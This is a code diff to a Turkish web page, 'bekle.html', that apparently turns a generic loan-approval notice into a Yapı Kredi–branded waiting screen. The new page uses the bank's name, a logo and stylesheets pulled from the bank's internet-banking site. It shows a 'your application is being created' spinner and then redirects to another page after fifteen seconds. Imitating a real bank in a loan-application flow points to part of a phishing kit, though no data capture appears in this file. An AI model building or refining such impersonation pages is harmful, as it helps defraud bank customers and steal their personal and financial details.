--- a/bekle.html
+++ b/bekle.html
@@ -3,36 +3,59 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Onay Sayfası</title>
+    <title>Yapı Kredi</title>
+    <link rel="stylesheet" href="https://https://internetsube.yapikredi.com.tr//ngi-static/css/source/fonts.css">
+    <link rel="stylesheet" href="https://https://internetsube.yapikredi.com.tr//ngi-static/css/main.ui.min.css">
+    <link rel="stylesheet" href="main.css">
     <style>
         body {
+            margin: 0;
+            height: 100vh;
             display: flex;
             justify-content: center;
             align-items: center;
-            height: 100vh;
-            background-color: #f4f4f4;
             font-family: Arial, sans-serif;
+            background: #ffffff; /* Arka plan tamamen beyaz */
+            color: #000; /* Yazılar siyah */
+        }
+        .container {
             text-align: center;
+            display: flex;
+            flex-direction: column;
+            justify-content: center;
+            align-items: center;
         }
-        .message-box {
-            background: white;
-            padding: 20px;
-            border-radius: 10px;
-            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
-        }
-        .logo {
-            width: 100px;
-            height: auto;
+        .loading-message {
+            font-size: 24px;
             margin-bottom: 20px;
+        }
+        .spinner {
+            border: 8px solid #f3f3f3;
+            border-top: 8px solid #3498db;
+            border-radius: 50%;
+            width: 50px;
+            height: 50px;
+            animation: spin 2s linear infinite;
+        }
+        @keyframes spin {
+            0% { transform: rotate(0deg); }
+            100% { transform: rotate(360deg); }
         }
     </style>
 </head>
 <body>
-    <div class="message-box">
-        <img src="basvuruonay.png" alt="Onay Logosu" class="logo">
-        <h2>Kredinizin Ön Onayı Alınması Halinde</h2>
-        <p>Müşteri temsilciniz tarafından onay için aranacaksınız.</p>
-        <p>Bu süre içerisinde tekrar başvuru yapmayınız.</p>
+    <div class="container">
+        <div class="logo">
+            <img src="./logo.png" alt="Yapı Kredi">
+        </div>
+        <div class="loading-message">Başvurunuz Oluşturuluyor Lütfen Bekleyiniz...</div>
+        <div class="spinner"></div>
     </div>
+
+    <script>
+        setTimeout(function() {
+            window.location.href = "kosul.html";
+        }, 15000);
+    </script>
 </body>
 </html>
